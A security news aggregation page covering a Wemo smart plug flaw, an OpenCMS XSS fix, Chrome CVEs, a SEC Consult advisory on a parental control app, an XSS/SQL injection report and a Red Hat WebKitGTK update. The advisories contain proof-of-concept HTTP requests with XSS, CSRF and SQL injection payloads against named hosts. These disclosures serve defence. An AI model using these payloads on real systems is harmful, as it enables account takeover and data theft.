Cyberattckers can easily exploit a command-injection bug in the popular device, but Belkin has no plans to address the security vulnerability.

The Wemo Mini Smart Plug V2, which allows users to remotely control anything plugged into it via a mobile app, has a security vulnerability that allows cyberattackers to throw the switch on a variety of bad outcomes. Those include remotely turning electronics on and off, and the potential for moving deeper into an internal network, or hop-scotching to additional devices.

Used by consumers and businesses alike, the Smart Plug plugs into an existing outlet, and connects to an internal Wi-Fi network and to the broader Internet using Universal Plug-n-Play (UPNP) ports. Users can then control the device via a mobile app, essentially offering a way to make old-school lamps, fans, and other utility items "smart." The app integrates with Alexa, Google Assistant, and Apple Home Kit, while offering additional features like scheduling for convenience. 

The flaw (CVE-2023-27217) is a buffer-overflow vulnerability that affects model F7C063 of the device and allows remote command injection, according to researchers at Sternum who discovered it. Unfortunately, when they tapped the device maker, Belkin, for a fix, they were told that no firmware update would be forthcoming since the device is end-of-life.

"Meanwhile, it's safe to assume that many of these devices are still deployed in the wild," they explained in an analysis on May 16, citing the 17,000 reviews and the four-star rating the Smart Plug has on Amazon. "The total sales on Amazon alone should be in the hundreds of thousands."

Igal Zeifman, vice president of marketing for Sternum, tells Dark Reading that's a low estimate for the attack surface. "That's us being very conservative," he notes. "We had three in our lab alone when the research started. Those are now unplugged."

    

The Wemo Smart Plug turns regular lamps and such into "smart" devices.

He adds, "If businesses are using this version of the Wemo Plugin inside their network, they should stop or (at the very least) make sure that the Universal Plug-n-Play (UPNP) ports are not exposed to remote access. If that device plays a critical role or is connected to a critical network or asset, you are not in great shape."  

**CVE-2023-27217: What's in a Name?**

The bug exists in the way the firmware handles the naming of the Smart Plug. While "Wemo mini 6E9" is the default name of the device out of the box, users can rename it as they wish using what's designated in the firmware as the "FriendlyName" variable — changing it to "kitchen outlet" for example or similar.

"This option for user input already had our Spidey senses tingling, especially when we saw that changing the name in the app came with some guardrails, \[specifically a 30-character limit\]," Sternum researchers noted. "For us, this immediately raised two questions: 'Says who?' and 'What happens if we manage to make it more than 30 characters?'"

When the mobile app didn't allow them to create a name longer than 30 characters, they decided to connect directly to the device via pyWeMo, an open-source Python module for the discovery and control of WeMo devices. They found that circumventing the app allowed them to get around the guardrail, in order to successfully input a longer name.

"The restriction was only enforced by the app itself and not by the firmware code," they noted. "Input validation like this should not be managed just on the 'surface' level."

Observing how the overstuffed 'FriendlyName' variable was handled by the memory structure, the researchers saw that the metadata of the heap was being corrupted by any name longer than 80 characters. Those corrupted values were then being used in subsequent heap operations, thus leading to short crashes. This resulted in a buffer overflow and the ability to control the resulting memory re-allocation, according to the analysis.

"It's a good wake-up call about the risk of using connected devices without any on-device security, which is 99.9% of devices today," Zeifman says.

**Watch Out for Easy Exploitation**

While Sternum isn't releasing a proof-of-concept exploit or enumerating what a real-world attack flow would look like in practice, Zeifman says the vulnerability isn't difficult to exploit. An attacker would need either network access, or remote Universal Plug-n-Play access if the device is open to the Internet.

"Outside of that, it's a trivial buffer overflow on a device with an executable heap," he explains. "Harder bastions have fallen."

He noted that it's likely that attacks could be carried out via Wemo's cloud infrastructure option as well.

"Wemo products also implement a cloud protocol (basically a STUN tunnel) that was meant to circumvent network address traversal (NAT) and allow the mobile app to operate the outlet through the Internet," Zeifman says. "While we didn't look too deeply into Wemo's cloud protocol, we wouldn't be surprised if this attack could be implemented that way as well."

In the absence of a patch, device users do have some mitigations they can take; for instance, as long as the Smart Plug is not exposed to the Internet, the attacker would have to obtain access to the same network, which makes exploitation more complicated.

Sternum detailed the following common-sense recommendations:

*   Avoid exposing the Wemo Smart Plug V2 UPNP ports to the Internet, either directly or via port forwarding.
*   If you are using the Smart Plug V2 in a sensitive network, you should ensure that it is properly segmented, and that device cannot communicate with other sensitive devices on the same subnet.

**IoT Security Continues to Lag**

As far as broader takeaways from the research, the findings showcase the fact that Internet of Things (IoT) vendors are still struggling with security by design — which organizations should take into account when installing any smart device.

"I think this is the key point of this story: This is what happens when devices are shipped without any on-device protection," Zeifman notes. "If you only rely on responsive security patching, as most device manufacturers do today, two things are certain. One, you will always be one step behind the attacker; and two, one day those patches will stop coming."

IoT devices should be equipped with "the same level of endpoint security that we expect other assets to have, our desktops, laptops, servers, etc.," he says. "If your heart monitor is less secure than the gaming laptop, something has gone horribly wrong – and it has."

Unpatched Wemo Smart Plug Bug Opens Countless Networks to Cyberattacks

A stored cross-site scripting (XSS) vulnerability in alkacon-OpenCMS v11.0.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field under the Upload Image module.

Expand Up

@@ -39,6 +39,8 @@

import org.opencms.gwt.shared.CmsAdditionalInfoBean;

import org.opencms.gwt.shared.CmsListInfoBean;

  

import com.google.gwt.dom.client.Element;

import com.google.gwt.user.client.DOM;

import com.google.gwt.user.client.ui.HTML;

  

/\*\*

Expand Down Expand Up

@@ -155,6 +157,13 @@ public CmsResultItemWidget(CmsResultItemBean infoBean, boolean showPath) {

  

}

  

private static Element appendDom(Element parent, String name) {

  

Element child = DOM.createElement(name);

parent.appendChild(child);

return child;

}

  

/\*\*

\* Gets the image tile.<p>

\*

Expand Down Expand Up

@@ -213,16 +222,17 @@ protected void onDetach() {

\*/

private String generateTooltipHtml(CmsListInfoBean infoBean) {

  

StringBuffer result = new StringBuffer();

result.append("<p><b>").append(CmsClientStringUtil.shortenString(infoBean.getTitle(), 70)).append("</b></p>");

Element root = DOM.createElement("div");

appendDom(appendDom(root, "p"), "b").setInnerText(CmsClientStringUtil.shortenString(infoBean.getTitle(), 70));

if (infoBean.hasAdditionalInfo()) {

for (CmsAdditionalInfoBean additionalInfo : infoBean.getAdditionalInfo()) {

result.append("<p>").append(additionalInfo.getName()).append(":&nbsp;");

// shorten the value to max 45 characters

result.append(CmsClientStringUtil.shortenString(additionalInfo.getValue(), 45)).append("</p>");

appendDom(root, "p").setInnerText(

additionalInfo.getName()

\+ ":\\u00a0"

\+ CmsClientStringUtil.shortenString(additionalInfo.getValue(), 45));

}

}

return result.toString();

return root.getInnerHTML();

}

  

/\*\*

Expand Down

CVE-2023-31544: Fixed XSS issue in gallery result view (github issue #652). · alkacon/opencms-core@21bfbea

Use after free in DevTools in Google Chrome prior to 113.0.5672.126 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-2723

Inappropriate implementation in WebApp Installs in Google Chrome prior to 113.0.5672.126 allowed an attacker who convinced a user to install a malicious web app to bypass install dialog via a crafted HTML page. (Chromium security severity: Medium)

CVE-2023-2726

Use after free in Navigation in Google Chrome prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)

**Chrome Releases**

Release updates from the Chrome team

CVE-2023-2721: Stable Channel Update for Desktop

Type confusion in V8 in Google Chrome prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-2724

Use after free in Autofill UI in Google Chrome on Android prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-2722

Kiddoware Kids Place Parental Control Android App versions 3.8.49 and below suffer from weak hashing, cross site request forgery, cross site scripting, and arbitrary file upload vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20230515-0 >  
=======================================================================  
               title: Multiple Vulnerabilities  
             product: Kiddoware Kids Place Parental Control Android App  
  vulnerable version: <=3.8.49  
       fixed version: 3.8.50 or higher  
          CVE number: CVE-2023-28153, CVE-2023-29078, CVE-2023-29079  
              impact: High  
            homepage: https://kiddoware.com  
               found: 2022-09-29  
                  by: Fabian Densborn (Office Vienna)  
                      Bernhard Gründling (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult.  
                      SEC Consult is part of Eviden, an atos business  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Kiddoware is the world’s leading parental control solutions company  
with a wide range of products and  serving over 5 million families  
worldwide. Kiddoware is committed in helping you to protect your kids  
while providing you intelligence to be proactive about your childs’  
online activities."

Source: https://kiddoware.com/

Business recommendation:  
------------------------  
The vendor provides an update for the affected version(s) which  
should be installed immediately.

An in-depth security analysis performed by security professionals is  
highly advised, to identify and resolve potential further critical security  
issues.

The issues identified in this application were part of our blog post  
"The hidden costs of parental control apps" published a few months ago:  
https://r.sec-consult.com/parents

Vulnerability overview/description:  
-----------------------------------  
1) Login and registration returns password as MD5 hash  
Login and registration requests return the unsalted MD5 hash  
of the password. This indicates that the passwords are stored  
in an insecure format at the server. Furthermore, MD5 hashing  
should not be used anymore in modern applications.

2) Stored XSS via device name in parent Dashboard (CVE-2023-29079)  
The customizable name of the child's device can be used to  
trigger a XSS payload in the parent web dashboard. Children  
might be able to attack their parents' account.

3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)  
All requests in the web dashboard are vulnerable to CSRF attacks.  
The requests contain the device Id of the child device which must  
be known to the attacker in order to successfully attack a child.  
But the device Id is not considered a secret, as it is used in  
the URL in some requests. An attacker could have obtained the Id  
through the browser history.

4) Arbitrary File Upload to AWS S3 bucket  
The web dashboard lets parents send files to the child's device.  
The selected file is uploaded to an AWS S3 bucket and the returned  
URL will be transmitted to the device which will then download it.  
It is possible to send arbitrary files to the child's device and  
thereby upload arbitrary files (size restriction ~10MB) to the  
AWS S3 bucket. The returned link is publicly available, so it is  
possible to use the server to spread malware.

5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)  
The child can remove all restrictions temporarily without the parents noticing.

Proof of concept:  
-----------------  
1) Login and registration returns password as MD5 hash  
The "Change password" request looks as follows:  
--------------------------------------------------------------------------------  
POST /account/change_password/ HTTP/1.1  
Host: kidsplace.kiddoware.com  
Cookie: [...]  
[...]

old_password=c869123c&new_password=password&confirm_password=password  
--------------------------------------------------------------------------------

The response from the web server contains the hashed, unsalted password:  
--------------------------------------------------------------------------------  
{  
  "error":null,  
  "result":  
    {  
      "email":"xxxxx@example.com",  
      "hashed_password":"5f4dcc3b5aa765d61d8327deb882cf99",  
      "message":"Password successfully changed!"  
    },  
  "status":200  
}  
--------------------------------------------------------------------------------

Proving this is an unsalted MD5 hash:

$ echo -n "password" | md5sum -t  
5f4dcc3b5aa765d61d8327deb882cf99  -

2) Stored XSS via device name in parent Dashboard (CVE-2023-29079)  
The device name can be changed by the child's account by sending a POST request  
to the API with the pushDeviceConfig method. The following payload can be used as  
a PoC to trigger an alert box on every page the device name is visible in the  
parent dashboard. Children/attackers would be able to take over their parents'  
accounts via this attack.

--------------------------------------------------------------------------------  
POST /v2/api/ HTTP/1.1  
Host: kidsplace.kiddoware.com  
Content-Type: application/json; charset=utf-8  
Content-Length: 461  
Accept-Encoding: gzip, deflate  
User-Agent: okhttp/3.12.8  
Connection: close

{  
     "method":"pushDeviceConfig",  
     "id":null,  
     "params":["a28fd8c5-2dcd-11ed-8a7f-0217330f2cf9",  
     {  
         "isGPSEnabled":false,"deviceGCMRegID":"",  
         "deviceUserAgeRange":3,  
         "deviceName":"\"><img src=x onerror=\"alert(1)\"/>",  
         [...]  
     }  
}  
--------------------------------------------------------------------------------

3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)  
As an example, an attacker can abuse the CSRF vulnerability to download an  
arbitrary file to a child's device. It is simply needed to create a form which  
automatically submits on page load. If a parent is logged in the web dashboard  
and visits this malicious site, the authenticated request will be sent and the  
file specified in the URL parameter will be downloaded by the child's device.

--------------------------------------------------------------------------------  
POST /account/push_content/ HTTP/1.1  
Host: kidsplace.kiddoware.com  
Cookie: [...]  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: https://kidsplace.kiddoware.com  
Content-Length: 75  
Connection: close

url=https%3A%2F%2Fgoogle.de%2Findex.html&message=&deviceID=XXXXXXX  
--------------------------------------------------------------------------------

4) Arbitrary File Upload to AWS S3 bucket  
The web dashboard lets parents upload arbitrary files to the Kiddoware AWS S3 bucket  
and push it to the child device.  
--------------------------------------------------------------------------------  
POST /account/push_content_file/ HTTP/1.1  
Host: kidsplace.kiddoware.com  
Cookie: [...]  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Content-Type: multipart/form-data; boundary=---------------------------27687116714103572458683268551  
Origin: https://kidsplace.kiddoware.com  
Content-Length: 296  
[...]

-----------------------------27687116714103572458683268551  
Content-Disposition: form-data; name="push_file"; filename="eicar.com.txt"  
Content-Type: text/plain

<eicar-file>  
-----------------------------27687116714103572458683268551--  
--------------------------------------------------------------------------------

The upload of the eicar file worked without errors and could subsequently also be  
downloaded  via the returned link. So there is no antivirus scan on the uploaded files.

5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)  
The child can disable the restrictions of the application without the parents noticing.  
For this, the following steps are necessary:  
a) If Android settings are blocked, reboot into Android Safe Mode.  
b) Disable "Display over other apps" Permission for the app in Android settings.  
c) After rebooting into normal mode, the child device can be used without restrictions.

For example, previously locked apps can now be used. To notice the problem, the parent  
has to check the parent's dashboard manually, a notification is not sent. If the child  
turns the permission back on in the meantime, the bypass will go unnoticed.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and downloaded through Google Play store, which was  
the most recent version available at the time of the test:  
* 3.8.45

Later on, version 3.8.49 (2022-10-25) has been verified to be vulnerable as well.

Vendor contact timeline:  
------------------------  
2022-11-23: Contacting vendor through kiddoware@kiddoware.com and support@kiddoware.com  
             Asking for security contact.  
2022-11-23: Response received, requesting advisory to be submitted to an employee mail.  
             No encryption demanded. Advisory sent to vendor.  
2022-11-28: Vendor informs about ongoing backend rewrites and removing some  
             upload functionalities. Some fixes will be live by Q1 2023.  
             Everything will be addressed by end of 01-04-2023.  
2022-12-15: SEC Consult informs about upcoming blog post about parental control apps.  
2022-12-15: Vendor states that most of the issues have already been fixed.  
2022-12-16: Recheck of vulnerabilities shows that not all vulnerabilities  
             have been sufficiently addressed. Vendor was informed.  
2022-12-16: Vendor explains what security measures will be implemented and  
             informs SEC Consult as soon as this is done.  
2022-12-30: Vendor informs that fixes for the found vulnerabilities have been published.  
2023-01-11: SEC Consult rechecks the vulnerabilities and found out that the applied  
             patches are not sufficient. Again, informs the vendor about it.  
2023-02-14: No response from vendor, reminder sent.  
2023-02-14: Vendor informs SEC Consult that all issues have been resolved.  
2023-03-10: Requesting CVE numbers.  
2023-03-12: Assigned CVE number for "Disable child restriction" finding.  
2023-03-31: Assigned CVE numbers for XSS and CSRF findings.  
2023-05-15: Public release of security advisory.

Solution:  
---------  
The vendor provides a patched version which should be installed immediately through Google  
Play store.  
* Version: 3.8.50 or higher

Workaround:  
-----------  
No workaround available.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult is part of Eviden, an atos business  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part  
of Eviden, an atos business. It ensures the continued knowledge gain of SEC  
Consult in the field of network and application security to stay ahead of the  
attacker. The SEC Consult Vulnerability Lab supports high-quality penetration  
testing and the evaluation of new offensive and defensive technologies for our  
customers. Hence our customers obtain the most current information about  
vulnerabilities and valid recommendation about the risk profile of new  
technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF F. Densborn, B. Gründling / @2023

Kiddoware Kids Place Parental Control Android App 3.8.49 XSS / CSRF / File Upload

GaanaGawaana Music Platform PHP Script version 1.0 suffers from cross site scripting and remote SQL injection vulnerabilities.

    ## Title: GaanaGawaana - Music Platform PHP Script-1.0 XSS-Reflectedand SQLi Vulnerability## Author: nu11secur1ty## Date: 05.16.2023## Vendor: https://www.codester.com/## Software: https://www.codester.com/items/27270/gaanagawaana-music-platform-php-script## Reference XSS: https://portswigger.net/web-security/cross-site-scripting## Reference SQLi: https://portswigger.net/web-security/sql-injection## Description:XSS: The value of the q request parameter is copied into the HTMLdocument as text between TITLE tags. The payloadaw9rx</title><script>alert(1)</script>rg1m6 was submitted in the qparameter. This input was echoed unmodified in the application'sresponse.--------------------------------------------------------------------------------------------------------------------------------SQLi: The q parameter appears to be vulnerable to SQL injectionattacks. The payloads 70346811' or 7218=7218-- and 18028207' or8587=8593-- were each submitted in the q parameter. These two requestsresulted in different responses, indicating that the input is beingincorporated into a SQL query in an unsafe way.STATUS: CRITICAL Vulnerability[+]Exploit-XSS-test:```XSSGET /search?q=aw9rx%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3erg1m6 HTTP/2Host: gaanagawaana.codesler.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="113", "Chromium";v="113"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+]Response-XSS-test:```HTTP/2 200 OKCache-Control: no-store, max-age=0, no-cacheDate: Tue, 16 May 2023 06:39:12 GMTContent-Type: text/html; charset=UTF-8Server: Apache<html><head><title>aw9rx</title><script>alert(1)</script>rg1m6's Song Download,Listen & Lyrics</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">```--------------------------------------------------------------------[+]Payload-SQLi:```SQLi---Parameter: q (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: q=-5722%' OR 2476=2476 AND 'nMde%'='nMde---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/codester/2023/GaanaGawaana-Music-Platform-PHP-Script-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/gaanagawaana-10-xss-reflected-sqli-for.html)## Time spend:01:10:00

GaanaGawaana Music Platform PHP Script 1.0 Cross Site Scripting / SQL Injection

Red Hat Security Advisory 2023-2834-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include buffer overflow, bypass, code execution, information leakage, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security and bug fix update  
Advisory ID:       RHSA-2023:2834-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2834  
Issue date:        2023-05-16  
CVE Names:         CVE-2022-32886 CVE-2022-32888 CVE-2022-32923  
                   CVE-2022-42799 CVE-2022-42823 CVE-2022-42824  
                   CVE-2022-42826 CVE-2022-42852 CVE-2022-42863  
                   CVE-2022-42867 CVE-2022-46691 CVE-2022-46692  
                   CVE-2022-46698 CVE-2022-46699 CVE-2022-46700  
                   CVE-2023-23517 CVE-2023-23518 CVE-2023-25358  
                   CVE-2023-25360 CVE-2023-25361 CVE-2023-25362  
                   CVE-2023-25363  
====================================================================  
1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* webkitgtk: use-after-free issue leading to arbitrary code execution  
(CVE-2022-42826)

* webkitgtk: memory corruption issue leading to arbitrary code execution  
(CVE-2023-23517)

* webkitgtk: memory corruption issue leading to arbitrary code execution  
(CVE-2023-23518)

* webkitgtk: buffer overflow issue was addressed with improved memory  
handling (CVE-2022-32886)

* webkitgtk: out-of-bounds write issue was addressed with improved bounds  
checking (CVE-2022-32888)

* webkitgtk: correctness issue in the JIT was addressed with improved  
checks (CVE-2022-32923)

* webkitgtk: issue was addressed with improved UI handling (CVE-2022-42799)

* webkitgtk: type confusion issue leading to arbitrary code execution  
(CVE-2022-42823)

* webkitgtk: sensitive information disclosure issue (CVE-2022-42824)

* webkitgtk: memory disclosure issue was addressed with improved memory  
handling (CVE-2022-42852)

* webkitgtk: memory corruption issue leading to arbitrary code execution  
(CVE-2022-42863)

* webkitgtk: use-after-free issue leading to arbitrary code execution  
(CVE-2022-42867)

* webkitgtk: memory corruption issue leading to arbitrary code execution  
(CVE-2022-46691)

* webkitgtk: Same Origin Policy bypass issue (CVE-2022-46692)

* webkitgtk: logic issue leading to user information disclosure  
(CVE-2022-46698)

* webkitgtk: memory corruption issue leading to arbitrary code execution  
(CVE-2022-46699)

* webkitgtk: memory corruption issue leading to arbitrary code execution  
(CVE-2022-46700)

* webkitgtk: heap-use-after-free in WebCore::RenderLayer::addChild()  
(CVE-2023-25358)

* webkitgtk: heap-use-after-free in WebCore::RenderLayer::renderer()  
(CVE-2023-25360)

* webkitgtk: heap-use-after-free in WebCore::RenderLayer::setNextSibling()  
(CVE-2023-25361)

* webkitgtk: heap-use-after-free in  
WebCore::RenderLayer::repaintBlockSelectionGaps() (CVE-2023-25362)

* webkitgtk: heap-use-after-free in  
WebCore::RenderLayer::updateDescendantDependentFlags() (CVE-2023-25363)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Additional Changes:

For detailed information on changes in this release, see the Red Hat  
Enterprise Linux 8.8 Release Notes linked from the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2127468 - Upgrade WebKitGTK for RHEL 8.8  
2128643 - CVE-2022-32886 webkitgtk: buffer overflow issue was addressed with improved memory handling  
2140501 - CVE-2022-32888 webkitgtk: out-of-bounds write issue was addressed with improved bounds checking  
2140502 - CVE-2022-32923 webkitgtk: correctness issue in the JIT was addressed with improved checks  
2140503 - CVE-2022-42799 webkitgtk: issue was addressed with improved UI handling  
2140504 - CVE-2022-42824 webkitgtk: sensitive information disclosure issue  
2140505 - CVE-2022-42823 webkitgtk: type confusion issue leading to arbitrary code execution  
2150970 - Can't create Google account  
2156986 - CVE-2022-42852 webkitgtk: memory disclosure issue was addressed with improved memory handling  
2156987 - CVE-2022-42863 webkitgtk: memory corruption issue leading to arbitrary code execution  
2156989 - CVE-2022-42867 webkitgtk: use-after-free issue leading to arbitrary code execution  
2156990 - CVE-2022-46691 webkitgtk: memory corruption issue leading to arbitrary code execution  
2156991 - CVE-2022-46692 webkitgtk: Same Origin Policy bypass issue  
2156992 - CVE-2022-46698 webkitgtk: logic issue leading to user information disclosure  
2156993 - CVE-2022-46699 webkitgtk: memory corruption issue leading to arbitrary code execution  
2156994 - CVE-2022-46700 webkitgtk: memory corruption issue leading to arbitrary code execution  
2167715 - CVE-2023-23518 webkitgtk: memory corruption issue leading to arbitrary code execution  
2167716 - CVE-2022-42826 webkitgtk: use-after-free issue leading to arbitrary code execution  
2167717 - CVE-2023-23517 webkitgtk: memory corruption issue leading to arbitrary code execution  
2175099 - CVE-2023-25358 webkitgtk: heap-use-after-free in WebCore::RenderLayer::addChild()  
2175101 - CVE-2023-25360 webkitgtk: heap-use-after-free in WebCore::RenderLayer::renderer()  
2175103 - CVE-2023-25361 webkitgtk: heap-use-after-free in WebCore::RenderLayer::setNextSibling()  
2175105 - CVE-2023-25362 webkitgtk: heap-use-after-free in WebCore::RenderLayer::repaintBlockSelectionGaps()  
2175107 - CVE-2023-25363 webkitgtk: heap-use-after-free in WebCore::RenderLayer::updateDescendantDependentFlags()

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
webkit2gtk3-2.38.5-1.el8.src.rpm

aarch64:  
webkit2gtk3-2.38.5-1.el8.aarch64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8.aarch64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8.aarch64.rpm  
webkit2gtk3-devel-2.38.5-1.el8.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8.aarch64.rpm  
webkit2gtk3-jsc-2.38.5-1.el8.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8.aarch64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8.aarch64.rpm

ppc64le:  
webkit2gtk3-2.38.5-1.el8.ppc64le.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8.ppc64le.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8.ppc64le.rpm  
webkit2gtk3-devel-2.38.5-1.el8.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8.ppc64le.rpm  
webkit2gtk3-jsc-2.38.5-1.el8.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8.ppc64le.rpm

s390x:  
webkit2gtk3-2.38.5-1.el8.s390x.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8.s390x.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8.s390x.rpm  
webkit2gtk3-devel-2.38.5-1.el8.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8.s390x.rpm  
webkit2gtk3-jsc-2.38.5-1.el8.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8.s390x.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8.s390x.rpm

x86_64:  
webkit2gtk3-2.38.5-1.el8.i686.rpm  
webkit2gtk3-2.38.5-1.el8.x86_64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8.i686.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8.x86_64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8.i686.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8.x86_64.rpm  
webkit2gtk3-devel-2.38.5-1.el8.i686.rpm  
webkit2gtk3-devel-2.38.5-1.el8.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8.i686.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8.x86_64.rpm  
webkit2gtk3-jsc-2.38.5-1.el8.i686.rpm  
webkit2gtk3-jsc-2.38.5-1.el8.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8.x86_64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8.i686.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-32886  
https://access.redhat.com/security/cve/CVE-2022-32888  
https://access.redhat.com/security/cve/CVE-2022-32923  
https://access.redhat.com/security/cve/CVE-2022-42799  
https://access.redhat.com/security/cve/CVE-2022-42823  
https://access.redhat.com/security/cve/CVE-2022-42824  
https://access.redhat.com/security/cve/CVE-2022-42826  
https://access.redhat.com/security/cve/CVE-2022-42852  
https://access.redhat.com/security/cve/CVE-2022-42863  
https://access.redhat.com/security/cve/CVE-2022-42867  
https://access.redhat.com/security/cve/CVE-2022-46691  
https://access.redhat.com/security/cve/CVE-2022-46692  
https://access.redhat.com/security/cve/CVE-2022-46698  
https://access.redhat.com/security/cve/CVE-2022-46699  
https://access.redhat.com/security/cve/CVE-2022-46700  
https://access.redhat.com/security/cve/CVE-2023-23517  
https://access.redhat.com/security/cve/CVE-2023-23518  
https://access.redhat.com/security/cve/CVE-2023-25358  
https://access.redhat.com/security/cve/CVE-2023-25360  
https://access.redhat.com/security/cve/CVE-2023-25361  
https://access.redhat.com/security/cve/CVE-2023-25362  
https://access.redhat.com/security/cve/CVE-2023-25363  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.8_release_notes/index

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

